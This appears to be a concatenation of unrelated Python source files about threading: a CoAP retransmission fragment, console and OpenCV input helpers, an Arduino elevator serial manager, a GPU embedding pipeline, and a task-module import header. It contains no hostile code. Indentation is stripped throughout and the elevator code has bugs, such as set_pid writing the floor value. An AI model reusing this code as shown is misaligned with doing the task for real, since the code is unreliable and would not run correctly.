transaction.retransmit_thread = threading.Thread(target=self._retransmit,
args=(transaction, message, future_time, 0))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
"""
Thread function to retransmit the message in the future
:param transaction: the transaction that owns the message that needs retransmission
:param message: the message that needs the retransmission task
:param future_time: the amount of time to wait before a new attempt
:param retransmit_count: the number of retransmissions
"""
with transaction:
while retransmit_count < defines.MAX_RETRANSMIT and (not message.acknowledged and not message.rejected) \
and not self.stopped.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not self.stopped.isSet():
retransmit_count += 1
future_time *= 2
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
if message.observe is not None:
self._observeLayer.remove_subscriber(message)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
def _start_separate_timer(self, transaction):
"""
Start a thread to handle separate mode.
:type transaction: Transaction
:param transaction: the transaction that is in processing
:rtype : the Timer object
"""
t = threading.Timer(defines.ACK_TIMEOUT, self._send_ack, (transaction,))
t.start()
return t
@staticmethod
def _stop_separate_timer(timer):
"""
Stop the separate Thread if an answer has been already provided to the client.
:param timer: The Timer object
"""
timer.cancel()
def _send_ack(self, transaction):
"""
Sends an ACK message for the request.
:param transaction: the transaction that owns the request
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.request.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.request, ack)
self.send_datagram(ack)
|
interact.py
|
import multiprocessing
import os
import sys
import threading
import time
import types
import colorama
import cv2
import numpy as np
from tqdm import tqdm
from core import stdex
is_colab = 'COLAB_GPU' in os.environ # Check if we are in a Google Colab environment
yn_str = {True:'y',False:'n'}
class InteractBase(object):
EVENT_LBUTTONDOWN = 1
EVENT_LBUTTONUP = 2
EVENT_MBUTTONDOWN = 3
EVENT_MBUTTONUP = 4
EVENT_RBUTTONDOWN = 5
EVENT_RBUTTONUP = 6
EVENT_MOUSEWHEEL = 10
def __init__(self):
self.named_windows = {}
self.capture_mouse_windows = {}
self.capture_keys_windows = {}
self.mouse_events = {}
self.key_events = {}
self.pg_bar = None
self.focus_wnd_name = None
self.error_log_line_prefix = '/!\\ '
self.process_messages_callbacks = {}
def is_support_windows(self):
return False
def is_colab(self):
return False
def on_destroy_all_windows(self):
raise NotImplemented
def on_create_window (self, wnd_name):
raise NotImplemented
def on_destroy_window (self, wnd_name):
raise NotImplemented
def on_show_image (self, wnd_name, img):
raise NotImplemented
def on_capture_mouse (self, wnd_name):
raise NotImplemented
def on_capture_keys (self, wnd_name):
raise NotImplemented
def on_process_messages(self, sleep_time=0):
raise NotImplemented
def on_wait_any_key(self):
raise NotImplemented
def log_info(self, msg, end='\n'):
if self.pg_bar is not None:
print ("\n")
print (msg, end=end)
def log_err(self, msg, end='\n'):
if self.pg_bar is not None:
print ("\n")
print (f'{self.error_log_line_prefix}{msg}', end=end)
def named_window(self, wnd_name):
if wnd_name not in self.named_windows:
#we will show window only on first show_image
self.named_windows[wnd_name] = 0
self.focus_wnd_name = wnd_name
else: print("named_window: ", wnd_name, " already created.")
def destroy_all_windows(self):
if len( self.named_windows ) != 0:
self.on_destroy_all_windows()
self.named_windows = {}
self.capture_mouse_windows = {}
self.capture_keys_windows = {}
self.mouse_events = {}
self.key_events = {}
self.focus_wnd_name = None
def destroy_window(self, wnd_name):
if wnd_name in self.named_windows:
self.on_destroy_window(wnd_name)
self.named_windows.pop(wnd_name)
if wnd_name == self.focus_wnd_name:
self.focus_wnd_name = list(self.named_windows.keys())[-1] if len( self.named_windows ) != 0 else None
if wnd_name in self.capture_mouse_windows:
self.capture_mouse_windows.pop(wnd_name)
if wnd_name in self.capture_keys_windows:
self.capture_keys_windows.pop(wnd_name)
if wnd_name in self.mouse_events:
self.mouse_events.pop(wnd_name)
if wnd_name in self.key_events:
self.key_events.pop(wnd_name)
def show_image(self, wnd_name, img):
if wnd_name in self.named_windows:
if self.named_windows[wnd_name] == 0:
self.named_windows[wnd_name] = 1
self.on_create_window(wnd_name)
if wnd_name in self.capture_mouse_windows:
self.capture_mouse(wnd_name)
self.on_show_image(wnd_name,img)
else: print("show_image: named_window ", wnd_name, " not found.")
def capture_mouse(self, wnd_name):
if wnd_name in self.named_windows:
self.capture_mouse_windows[wnd_name] = True
if self.named_windows[wnd_name] == 1:
self.on_capture_mouse(wnd_name)
else: print("capture_mouse: named_window ", wnd_name, " not found.")
def capture_keys(self, wnd_name):
if wnd_name in self.named_windows:
if wnd_name not in self.capture_keys_windows:
self.capture_keys_windows[wnd_name] = True
self.on_capture_keys(wnd_name)
else: print("capture_keys: already set for window ", wnd_name)
else: print("capture_keys: named_window ", wnd_name, " not found.")
def progress_bar(self, desc, total, leave=True, initial=0):
if self.pg_bar is None:
self.pg_bar = tqdm( total=total, desc=desc, leave=leave, ascii=True, initial=initial )
else: print("progress_bar: already set.")
def progress_bar_inc(self, c):
if self.pg_bar is not None:
self.pg_bar.n += c
self.pg_bar.refresh()
else: print("progress_bar not set.")
def progress_bar_close(self):
if self.pg_bar is not None:
self.pg_bar.close()
self.pg_bar = None
else: print("progress_bar not set.")
def progress_bar_generator(self, data, desc=None, leave=True, initial=0):
self.pg_bar = tqdm( data, desc=desc, leave=leave, ascii=True, initial=initial )
for x in self.pg_bar:
yield x
self.pg_bar.close()
self.pg_bar = None
def add_process_messages_callback(self, func ):
tid = threading.get_ident()
callbacks = self.process_messages_callbacks.get(tid, None)
if callbacks is None:
callbacks = []
self.process_messages_callbacks[tid] = callbacks
callbacks.append ( func )
def process_messages(self, sleep_time=0):
callbacks = self.process_messages_callbacks.get(threading.get_ident(), None)
if callbacks is not None:
for func in callbacks:
func()
self.on_process_messages(sleep_time)
def wait_any_key(self):
self.on_wait_any_key()
def add_mouse_event(self, wnd_name, x, y, ev, flags):
if wnd_name not in self.mouse_events:
self.mouse_events[wnd_name] = []
self.mouse_events[wnd_name] += [ (x, y, ev, flags) ]
def add_key_event(self, wnd_name, ord_key, ctrl_pressed, alt_pressed, shift_pressed):
if wnd_name not in self.key_events:
self.key_events[wnd_name] = []
self.key_events[wnd_name] += [ (ord_key, chr(ord_key) if ord_key <= 255 else chr(0), ctrl_pressed, alt_pressed, shift_pressed) ]
def get_mouse_events(self, wnd_name):
ar = self.mouse_events.get(wnd_name, [])
self.mouse_events[wnd_name] = []
return ar
def get_key_events(self, wnd_name):
ar = self.key_events.get(wnd_name, [])
self.key_events[wnd_name] = []
return ar
def input(self, s):
return input(s)
def input_number(self, s, default_value, valid_list=None, show_default_value=True, add_info=None, help_message=None):
if show_default_value and default_value is not None:
s = f"[{default_value}] {s}"
if add_info is not None or \
help_message is not None:
s += " ("
if add_info is not None:
s += f" {add_info}"
if help_message is not None:
s += " ?:help"
if add_info is not None or \
help_message is not None:
s += " )"
s += " : "
while True:
try:
inp = input(s)
if len(inp) == 0:
result = default_value
break
if help_message is not None and inp == '?':
print (help_message)
continue
i = float(inp)
if (valid_list is not None) and (i not in valid_list):
result = default_value
break
result = i
break
except:
result = default_value
break
print(result)
return result
def input_int(self, s, default_value, valid_range=None, valid_list=None, add_info=None, show_default_value=True, help_message=None):
if show_default_value:
if len(s) != 0:
s = f"[{default_value}] {s}"
else:
s = f"[{default_value}]"
if add_info is not None or \
valid_range is not None or \
help_message is not None:
s += " ("
if valid_range is not None:
s += f" {valid_range[0]}-{valid_range[1]}"
if add_info is not None:
s += f" {add_info}"
if help_message is not None:
s += " ?:help"
if add_info is not None or \
valid_range is not None or \
help_message is not None:
s += " )"
s += " : "
while True:
try:
inp = input(s)
if len(inp) == 0:
raise ValueError("")
if help_message is not None and inp == '?':
print (help_message)
continue
i = int(inp)
if valid_range is not None:
i = int(np.clip(i, valid_range[0], valid_range[1]))
if (valid_list is not None) and (i not in valid_list):
i = default_value
result = i
break
except:
result = default_value
break
print (result)
return result
def input_bool(self, s, default_value, help_message=None):
s = f"[{yn_str[default_value]}] {s} ( y/n"
if help_message is not None:
s += " ?:help"
s += " ) : "
while True:
try:
inp = input(s)
if len(inp) == 0:
raise ValueError("")
if help_message is not None and inp == '?':
print (help_message)
continue
return bool ( {"y":True,"n":False}.get(inp.lower(), default_value) )
except:
print ( "y" if default_value else "n" )
return default_value
def input_str(self, s, default_value=None, valid_list=None, show_default_value=True, help_message=None):
if show_default_value and default_value is not None:
s = f"[{default_value}] {s}"
if valid_list is not None or \
help_message is not None:
s += " ("
if valid_list is not None:
s += " " + "/".join(valid_list)
if help_message is not None:
s += " ?:help"
if valid_list is not None or \
help_message is not None:
s += " )"
s += " : "
while True:
try:
inp = input(s)
if len(inp) == 0:
if default_value is None:
print("")
return None
result = default_value
break
if help_message is not None and inp == '?':
print(help_message)
continue
if valid_list is not None:
if inp.lower() in valid_list:
result = inp.lower()
break
if inp in valid_list:
result = inp
break
continue
result = inp
break
except:
result = default_value
break
print(result)
return result
def input_process(self, stdin_fd, sq, str):
sys.stdin = os.fdopen(stdin_fd)
try:
inp = input (str)
sq.put (True)
except:
sq.put (False)
def input_in_time (self, str, max_time_sec):
sq = multiprocessing.Queue()
p = multiprocessing.Process(target=self.input_process, args=( sys.stdin.fileno(), sq, str))
p.daemon = True
p.start()
t = time.time()
inp = False
while True:
if not sq.empty():
inp = sq.get()
break
if time.time() - t > max_time_sec:
break
p.terminate()
p.join()
old_stdin = sys.stdin
sys.stdin = os.fdopen( os.dup(sys.stdin.fileno()) )
old_stdin.close()
return inp
def input_process_skip_pending(self, stdin_fd):
sys.stdin = os.fdopen(stdin_fd)
while True:
try:
if sys.stdin.isatty():
sys.stdin.read()
except:
pass
def input_skip_pending(self):
if is_colab:
# currently it does not work on Colab
return
"""
skips unnecessary inputs between the dialogs
"""
p = multiprocessing.Process(target=self.input_process_skip_pending, args=( sys.stdin.fileno(), ))
p.daemon = True
p.start()
time.sleep(0.5)
p.terminate()
p.join()
sys.stdin = os.fdopen( sys.stdin.fileno() )
class InteractDesktop(InteractBase):
def __init__(self):
colorama.init()
super().__init__()
def color_red(self):
pass
def is_support_windows(self):
return True
def on_destroy_all_windows(self):
cv2.destroyAllWindows()
def on_create_window (self, wnd_name):
cv2.namedWindow(wnd_name)
def on_destroy_window (self, wnd_name):
cv2.destroyWindow(wnd_name)
def on_show_image (self, wnd_name, img):
cv2.imshow (wnd_name, img)
def on_capture_mouse (self, wnd_name):
self.last_xy = (0,0)
def onMouse(event, x, y, flags, param):
(inst, wnd_name) = param
if event == cv2.EVENT_LBUTTONDOWN: ev = InteractBase.EVENT_LBUTTONDOWN
elif event == cv2.EVENT_LBUTTONUP: ev = InteractBase.EVENT_LBUTTONUP
elif event == cv2.EVENT_RBUTTONDOWN: ev = InteractBase.EVENT_RBUTTONDOWN
elif event == cv2.EVENT_RBUTTONUP: ev = InteractBase.EVENT_RBUTTONUP
elif event == cv2.EVENT_MBUTTONDOWN: ev = InteractBase.EVENT_MBUTTONDOWN
elif event == cv2.EVENT_MBUTTONUP: ev = InteractBase.EVENT_MBUTTONUP
elif event == cv2.EVENT_MOUSEWHEEL:
ev = InteractBase.EVENT_MOUSEWHEEL
x,y = self.last_xy #fix opencv bug when window size more than screen size
else: ev = 0
self.last_xy = (x,y)
inst.add_mouse_event (wnd_name, x, y, ev, flags)
cv2.setMouseCallback(wnd_name, onMouse, (self,wnd_name) )
def on_capture_keys (self, wnd_name):
pass
def on_process_messages(self, sleep_time=0):
has_windows = False
has_capture_keys = False
if len(self.named_windows) != 0:
has_windows = True
if len(self.capture_keys_windows) != 0:
has_capture_keys = True
if has_windows or has_capture_keys:
wait_key_time = max(1, int(sleep_time*1000) )
ord_key = cv2.waitKeyEx(wait_key_time)
shift_pressed = False
if ord_key != -1:
chr_key = chr(ord_key) if ord_key <= 255 else chr(0)
if chr_key >= 'A' and chr_key <= 'Z':
shift_pressed = True
ord_key += 32
elif chr_key == '?':
shift_pressed = True
ord_key = ord('/')
elif chr_key == '<':
shift_pressed = True
ord_key = ord(',')
elif chr_key == '>':
shift_pressed = True
ord_key = ord('.')
else:
if sleep_time != 0:
time.sleep(sleep_time)
if has_capture_keys and ord_key != -1:
self.add_key_event ( self.focus_wnd_name, ord_key, False, False, shift_pressed)
def on_wait_any_key(self):
cv2.waitKey(0)
class InteractColab(InteractBase):
def is_support_windows(self):
return False
def is_colab(self):
return True
def on_destroy_all_windows(self):
pass
#clear_output()
def on_create_window (self, wnd_name):
pass
#clear_output()
def on_destroy_window (self, wnd_name):
pass
def on_show_image (self, wnd_name, img):
pass
# # cv2 stores colors as BGR; convert to RGB
# if img.ndim == 3:
# if img.shape[2] == 4:
# img = cv2.cvtColor(img, cv2.COLOR_BGRA2RGBA)
# else:
# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# img = PIL.Image.fromarray(img)
# plt.imshow(img)
# plt.show()
def on_capture_mouse (self, wnd_name):
pass
#print("on_capture_mouse(): Colab does not support")
def on_capture_keys (self, wnd_name):
pass
#print("on_capture_keys(): Colab does not support")
def on_process_messages(self, sleep_time=0):
time.sleep(sleep_time)
def on_wait_any_key(self):
pass
#print("on_wait_any_key(): Colab does not support")
if is_colab:
interact = InteractColab()
else:
interact = InteractDesktop()
|
elevator_manager.py
|
from serial.serialutil import EIGHTBITS
import serial.tools.list_ports
import serial #pyserial
from time import time, sleep
from cobs import cobs # for encoding
import threading
BAUDRATE = 9600
ARDUINO_COUNT = 2
SERVER_COUNT = 2
ELEVATOR_COUNT = 2
QUEUE_SIZE = 255
COBS_DELIMITER = b'\0' # COBS 1-byte delimiter is hex zero as a (binary) bytes character
STD_ENCODE_SIZE = 14
STD_DECODE_SIZE = 14
EID_OFFSET = 1
DOOR_OFFSET = 2
LIGHT_OFFSET = 3
FLOOR_OFFSET = 4
PID_OFFSET = 5
TEMP_OFFSET = 6
LOAD_OFFSET = 7
PERSON_OFFSET = 8
MAINTENANCE_OFFSET = 9
DIRECTION_OFFSET = 10
MOVING_OFFSET = 11
MSG_OFFSET = 12
WELCOME_MSG = "Welcome to the elevator system Prototype"
IDLE_MSG = "Elevator is in Idle State"
MOVING_MSG = "Elevator is in Moving State!"
EMERGENCY_MSG = "Elevator has entered Emergency State!"
ENERGY_SAVING_MSG = "Elevator is entering energy saving mode!"
msgs_dict = {0:WELCOME_MSG, 1:IDLE_MSG, 2:MOVING_MSG, 3:EMERGENCY_MSG, 4:ENERGY_SAVING_MSG}
class ElevatorManager:
def __init__(self):
self.initialize_containers()
self.init_elev_attrs()
#self.arduino_message_queue = Queue(maxsize = 20)
self.port_list = serial.tools.list_ports.comports(include_links=False) # searches for all computer ports
self.initialize_arduino_ports()
#self.connect_to_servers() # method for testing
def initialize_containers(self) -> None:
self.eid_list = [] # Container for unique eids
self.tid_list = [] # Container for tids.
self.serial_channel_list = []
self.aduino_thread_dict = {} # Dictionary to that has unique eid's to difference between conflicting eid's.
def init_elev_attrs(self) -> None:
self.eid = 0 # elevator identifier
self.door_status = 0 #
self.light_status = 0
self.current_floor = 0
self.pid = 0
self.temp = 0
self.load = 0
self.person_counter = 0
self.maintenance = 0
self.direction = 0
self.moving = 0
self.msg_to_user = 0
def initialize_arduino_ports(self) -> None:
""" Automatically detect the ports of the arduinos."""
try:
temp = [] # temporary container for ports
for port in self.port_list:
#print('Find port '+ port.device)
temp.append(port.device)
# macbook ports
self.port1 = temp[2]
self.port2 = temp[3]
self.connect_arduinos(self.port1, self.port2, BAUDRATE)
except:
print("Error detecting ports.\n")
def terminate_arduino_ports(self):
""" Closes the two ports of the arduinos."""
def connect_arduinos(self, port1: None, port2: None, baudrate=EIGHTBITS)-> None:
""" Connect pair of arduinos."""
try:
self.arduino_serial_channel_1 = serial.Serial(port1, baudrate) # mega2560
self.arduino_serial_channel_2 = serial.Serial(port2, baudrate) # mega2560
self.assign_serial_channels(self.arduino_serial_channel_1, self.arduino_serial_channel_2)
except:
print("Error connecting to an Arduino.\n")
def assign_serial_channels(self, arduino_1:serial.Serial, arduino_2:serial.Serial) -> None:
""" This method assigns the incoming a arduino channels to a serial channel
container where it can later be used to read and write. """
try:
self.serial_channel_list.append(arduino_1)
self.serial_channel_list.append(arduino_2)
print(self.serial_channel_list)
except:
print("Cannot assign serial channels")
def connect_to_servers(self) -> None:
""" Dummy communication stablish to initially test the prototype """
self.arduino_t1 = threading.Thread(target= self.process_arduinos, args = (self.serial_channel_list[0],))
self.arduino_t2 = threading.Thread(target= self.process_arduinos, args = (self.serial_channel_list[1],))
self.arduino_t1.start()
self.arduino_t2.start()
self.arduino_t1.join()
self.arduino_t2.join()
def process_arduinos(self, arduino:serial.Serial) -> None:
""" Subroutine inside each thread that excutes the UART protocol.
MORE TO BE IMPLEMENTED. """
while(1):
current_tid = threading.current_thread().ident
print(current_tid)
self.tid_list.append(current_tid)
self.serial_service_rx(arduino)
self.request = self.initialize_cobs_pkt_list(self.eid, self.door_status, self.light_status,
self.current_floor, self.pid, self.temp, self.load, self.person_counter,
self.maintenance, self.direction, self.moving, self.msg_to_user)
self.serial_service_tx(arduino, self.request)
sleep(0.5)
def create_unique_eids(self) -> None:
self.aduino_thread_dict[0] = self.tid_list[0]
self.aduino_thread_dict[1] = self.tid_list[1]
def get_global_eid(self, global_eid:int) -> None:
""" Uses modular arithmetic to get reference a specific arduino
to a specific elevator."""
try:
number_of_bins = global_eid * (ELEVATOR_COUNT - 1) # elevator bins (2)
desired_bin = number_of_bins/ELEVATOR_COUNT # to get correct bin
desired_elevator = number_of_bins%ELEVATOR_COUNT # to get specific elevator
#print(self.aduino_thread_dict[desired_bin],desired_elevator)
except:
print("Cannot initialize four unique eid's.\n")
def initialize_cobs_pkt_list(self,*kwargs:tuple) -> None:
cobs_pkt_list = []
for elevator_attr in kwargs:
cobs_pkt_list.append(elevator_attr)
print("Cobs container:", cobs_pkt_list)
return cobs_pkt_list
def cobs_encode(self, pkt:bytes) -> None:
encoded_pkt = cobs.encode(pkt)
encoded_pkt += COBS_DELIMITER
return encoded_pkt
def cobs_decode(self, serial_channel:serial.Serial, pkt_size:int) -> list:
time_to_decode = 1
start = time()
byte_counter = 0
encoded_pkt = bytearray()
while time() - start < time_to_decode:
# Wait until all bytes are in pyserial rx buffer
if serial_channel.in_waiting:
# read bytes
if byte_counter<pkt_size:
bit = serial_channel.read()
byte_counter +=1
encoded_pkt+= bit
print("Encoded Byte", encoded_pkt)
if bit == b'\xff': # if cobs delimeter found
decoded_pkt = list(encoded_pkt)
print(decoded_pkt)
byte_counter = 0;
return decoded_pkt
def extract_pkt_data(self, pkt:list) -> None:
self.eid = pkt[EID_OFFSET]
self.door_status = pkt[DOOR_OFFSET]
self.light_status = pkt[LIGHT_OFFSET]
self.current_floor = pkt[FLOOR_OFFSET]
self.pid = pkt[PID_OFFSET]
self.temp = pkt[TEMP_OFFSET]
self.load = pkt[LOAD_OFFSET]
self.person_counter = pkt[PERSON_OFFSET]
self.maintenance = pkt[MAINTENANCE_OFFSET]
self.direction = pkt[DIRECTION_OFFSET]
self.moving = pkt[MOVING_OFFSET]
self.msg_to_user = pkt[MSG_OFFSET]
def serial_service_rx(self, serial_channel:serial.Serial) -> None:
decoded_pkt = self.cobs_decode(serial_channel, STD_DECODE_SIZE)
#testing stuff
print(decoded_pkt[EID_OFFSET])
print(decoded_pkt[DOOR_OFFSET])
print(decoded_pkt[LIGHT_OFFSET])
print(decoded_pkt[FLOOR_OFFSET])
print(decoded_pkt[PID_OFFSET])
print(decoded_pkt[TEMP_OFFSET])
print(decoded_pkt[LOAD_OFFSET])
print(decoded_pkt[PERSON_OFFSET])
print(decoded_pkt[MAINTENANCE_OFFSET])
print(decoded_pkt[DIRECTION_OFFSET])
print(decoded_pkt[MOVING_OFFSET])
print(decoded_pkt[MSG_OFFSET])
msg = decoded_pkt[MSG_OFFSET]
print(msgs_dict[msg])
self.extract_pkt_data(decoded_pkt)
def serial_service_tx(self, serial_channel:serial.Serial, pkt:list) -> None:
cobs_pkt = bytearray(pkt)
service = self.cobs_encode(cobs_pkt)
serial_channel.write(service)
serial_channel.flush()
print("Service request:",service)
def display_elevator_attr(self):
""" Return attributes of a designated elevator to display to the user. """
self.get_door_status()
self.get_light_status()
self.get_floor()
self.get_temp()
self.get_load()
return
# have to verify
def get_eid(self) -> int:
""" Return eid of a designated elevator to display to the user. """
return self.eid
def get_door_status(self) -> int:
return self.door_status
def get_light_status(self) -> int:
return self.light_status
def get_floor(self) -> int:
return self.current_floor
def get_pid(self) -> int:
return self.pid
def get_temp(self) -> int:
return self.temp
def get_load(self) -> int:
return self.load
def get_msg_to_user(self) -> int:
return self.msg_to_user
def set_eid(self, eid:int) -> None:
self.eid = eid
def set_door_status(self, door_status:int) -> None:
self.door_status = door_status
def set_light_status(self, light_status:int) -> None:
self.light_status = light_status
def set_pid(self, pid:int) -> None:
self.current_floor = pid
def set_floor(self, current_floor:int) -> None:
self.current_floor = current_floor
def set_temp(self, temp:int) -> None:
self.temp = temp
def set_load(self, load:int) -> None:
self.load = load
def set_msg_to_user(self, msg_to_user:int) -> None:
self.msg_to_user = msg_to_user
manager = ElevatorManager()
manager.connect_to_servers() # testing
|
pipeline.py
|
import os
import threading as th
from collections import OrderedDict as OrdD
from queue import Queue
from time import sleep
from typing import Dict, List, Optional, OrderedDict, Tuple
import numpy as np
import torch as pt
from ._logging import get_logger
from ._utils import get_tf_device
from .custom_types import CacheType, DataType, DataWithInfo, EmbeddingSlice
from .embedding import EmbeddingConfig, EmbeddingDataset, EmbeddingDatasetsTuple, PCASpec
from .reader import ReaderConfig, data_factory
from .result import Observer
from .strategy import StrategyConfig, strategy_factory
_logger = get_logger(__name__)
def _compatibility_check(train: ReaderConfig,
test: ReaderConfig,
embedding_configs: List[EmbeddingConfig]):
# Check number of embeddings
assert len(embedding_configs) > 0, "There should be at least one embedding specified!"
# Check input data same
filtered_data_types = [i for i in [train.data_type, test.data_type] if i != DataType.ANY]
num_distinct_data_types = len(set(filtered_data_types))
assert num_distinct_data_types <= 1, \
f"Data type should be same for training and test data! Found '{train.data_type.value}' for train data and " \
f"'{test.data_type.value}' for test data!"
# Check embeddings same
embeddings_types = [embedding_config.embedding_model_spec.data_type for embedding_config in embedding_configs]
filtered_embedding_types = [i for i in embeddings_types if i != DataType.ANY]
num_distinct_embedding_types = len(set(filtered_embedding_types))
assert num_distinct_embedding_types <= 1, "All embeddings should process data of same type!"
# Check input data same as embeddings
assert num_distinct_data_types == 0 or num_distinct_embedding_types == 0 or \
filtered_data_types[0] == filtered_embedding_types[0], \
f"Specified embeddings process data of type '{filtered_embedding_types[0].value}', whereas the data is of " \
f"type '{filtered_data_types[0].value}'!"
# PCA-specific checks
# Check that there is at most one PCA transformation defined per output dimension
pca_output_dimensions = [e.embedding_model_spec.output_dimension for e in embedding_configs if
isinstance(e.embedding_model_spec, PCASpec)]
assert len(set(pca_output_dimensions)) == len(pca_output_dimensions), \
"There can be at most one PCA transformation defined per unique PCA output dimension!"
def run(train_data_config: ReaderConfig,
test_data_config: ReaderConfig,
embedding_configs: OrderedDict[str, EmbeddingConfig],
strategy_config: StrategyConfig,
observer: Observer,
device: pt.device):
# Check that data and embeddings are compatible
_compatibility_check(train_data_config, test_data_config, list(embedding_configs.values()))
# Prepare raw data
train_data_raw = data_factory(train_data_config)
test_data_raw = data_factory(test_data_config)
# Transform config Objects into EmbeddingDataset
embedding_datasets = OrdD()
for key in embedding_configs:
# PCA is a special case, it is run immediately on the CPU, strategy has only one lever pull available
# Special behaviour is needed, because the transformation depends on the whole training dataset
if isinstance(embedding_configs[key].embedding_model_spec, PCASpec):
min_batch_size = max(train_data_raw.size, test_data_raw.size)
assert embedding_configs[key].batch_size >= min_batch_size, \
f"For PCA embedding, batch size must be large to fit whole training/test set. " \
f"For the dataset specified it has to be at least {min_batch_size}!"
# Prepare embedding
train = EmbeddingDataset(train_data_raw, embedding_configs[key], CacheType.DEVICE, device)
test = EmbeddingDataset(test_data_raw, embedding_configs[key], CacheType.DEVICE, device)
# IMPORTANT: order of calls defines what is used for training and what for testing
train.prepare()
test.prepare()
else:
train = EmbeddingDataset(train_data_raw, embedding_configs[key], CacheType.NONE, device)
test = EmbeddingDataset(test_data_raw, embedding_configs[key], CacheType.DEVICE, device)
embedding_datasets[key] = EmbeddingDatasetsTuple(train=train, test=test)
# Initialize strategy
strategy = strategy_factory(strategy_config)
# Run strategy
strategy.execute(datasets=embedding_datasets, observer=observer)
def store_embeddings(train_data_config: ReaderConfig,
test_data_config: ReaderConfig,
embedding_configs: OrderedDict[str, EmbeddingConfig],
output_files_path: str,
device: Optional[pt.device] = None,
filename_mapping: Dict[str, str] = None):
# Use name given to embedding as filename
if filename_mapping is None:
filename_mapping = {x: x for x in embedding_configs}
assert set(embedding_configs.keys()) == set(filename_mapping.keys()), \
f"Filename should be specified for each embedding!"
# Check that data and embeddings are compatible
_compatibility_check(train_data_config, test_data_config, list(embedding_configs.values()))
# Prepare raw data
train_data_raw = data_factory(train_data_config)
test_data_raw = data_factory(test_data_config)
# Parallel execution variables
# # Which devices will be used for execution
# # # 1. If device is specified, use only that device
if device:
num_devices = 1
available_devices = [device]
# # # 2. If device is not specified use all available GPUs
else:
num_devices = pt.cuda.device_count()
assert num_devices > 0, "There are no GPU devices available!"
available_devices = [pt.device("cuda", i) for i in range(num_devices)]
_logger.info(f"{num_devices} device(s) will be used for running inference:"
f" {', '.join(map(get_tf_device, available_devices))}")
# # Used to signal result of embedding inference to the main thread
queue = Queue()
# # One flag per device signalling whether a device is free to use
is_worker_free = [True] * num_devices
# # Counters (indices) of jobs started and finished
index_started = 0
index_finished = 0
# # Mapping that is used to signal that a device is free after a job is done executing
mapping_key_to_worker_index = {}
# # Info about embeddings
num_embeddings = len(embedding_configs)
keys_list = list(embedding_configs.keys())
# Used by job function
def job_inner(data_raw: DataWithInfo, config: EmbeddingConfig, target_device: pt.device) -> \
Tuple[np.ndarray, np.ndarray]:
ed = EmbeddingDataset(data_raw, config, CacheType.CPU, target_device)
ed.prepare()
es: EmbeddingSlice = ed.get_cache(0, ed.size, copy_to_device=False)
del ed
# Since copy_to_device is set to False and CPU cache is used, there is no need to transfer data to CPU
features = es.features.numpy()
labels = es.labels.numpy()
return features, labels
# Run inference of embedding on specified device and put result to queue
def job(key: str, config: EmbeddingConfig, target_device: pt.device):
# Uses variables defined in function: train_data_raw, test_data_raw, queue
# Training data
_logger.info(f"Computing '{key}' embeddings for train dataset on {get_tf_device(target_device)}")
train_features, train_labels = job_inner(train_data_raw, config, target_device)
# Test data
_logger.info(f"Computing '{key}' embeddings for test dataset on {get_tf_device(target_device)}")
test_features, test_labels = job_inner(test_data_raw, config, target_device)
queue.put((key, (train_features, train_labels, test_features, test_labels)))
# We are done when all jobs are finished
while index_finished < num_embeddings:
# Check whether there is a job to start or finish every second
sleep(1)
# Start new jobs if possible
while index_started < num_embeddings and True in is_worker_free:
index_free_worker = is_worker_free.index(True)
is_worker_free[index_free_worker] = False
# Get key
key_ = keys_list[index_started]
# Get device used for executing a job
job_device = available_devices[index_free_worker]
# Store worker index, so that worker can be marked as free after the job completes
mapping_key_to_worker_index[key_] = index_free_worker
# Handle PCA as a special case
if isinstance(embedding_configs[key_].embedding_model_spec, PCASpec):
min_batch_size = max(train_data_raw.size, test_data_raw.size)
assert job_device.type == "cpu", \
"PCA can only be executed on CPU! Specify device as CPU instead to ensure execution on CPU!"
assert embedding_configs[key_].batch_size >= min_batch_size, \
f"For PCA embedding, batch size must be large to fit whole training/test set. " \
f"For the dataset specified it has to be at least {min_batch_size}!"
t = th.Thread(target=job, args=(key_, embedding_configs[key_], job_device))
t.start()
# Signal that this job was launched
index_started += 1
# Handle finished jobs
while not queue.empty():
key_, data = queue.get()
# Mark worker as available
index_completed_worker = mapping_key_to_worker_index[key_]
is_worker_free[index_completed_worker] = True
# Signal that job was finished
index_finished += 1
# Store processed data
_logger.info(f"Storing '{key_}' embeddings")
np.savez(os.path.join(output_files_path, filename_mapping[key_]),
train_features=data[0],
train_labels=data[1],
test_features=data[2],
test_labels=data[3])
|
task.py
|
""" Backend task management support """
import itertools
import json
import logging
import os
import sys
import re
from enum import Enum
from tempfile import gettempdir
from multiprocessing import RLock
from pathlib2 import Path
from threading import Thread
from typing import Optional, Any, Sequence, Callable, Mapping, Union, List
from uuid import uuid4
try:
# noinspection PyCompatibility
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
from collections import OrderedDict
from six.moves.urllib.parse import quote
from ...utilities.locks import RLock as FileRLock
from ...binding.artifacts import Artifacts
from ...backend_interface.task.development.worker import DevWorker
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from ...backend_api.session.defs import ENV_OFFLINE_MODE
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ..base import IdObjectBase, InterfaceBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import make_message, get_or_create_project, get_single_result, \
exact_match_regex
from ...config import (
get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR, get_log_to_backend,
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR, get_offline_dir)
from ...debugging import get_logger
from ...debugging.log import LoggerRoot
from ...storage.helper import StorageHelper, StorageError
from .access import AccessMixin
from .log import TaskHandler
from .repo import ScriptInfo
from .repo.util import get_command_output
from ...config import config, PROC_MASTER_ID_ENV_VAR, SUPPRESS_UPDATE_MESSAGE_ENV_VAR
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
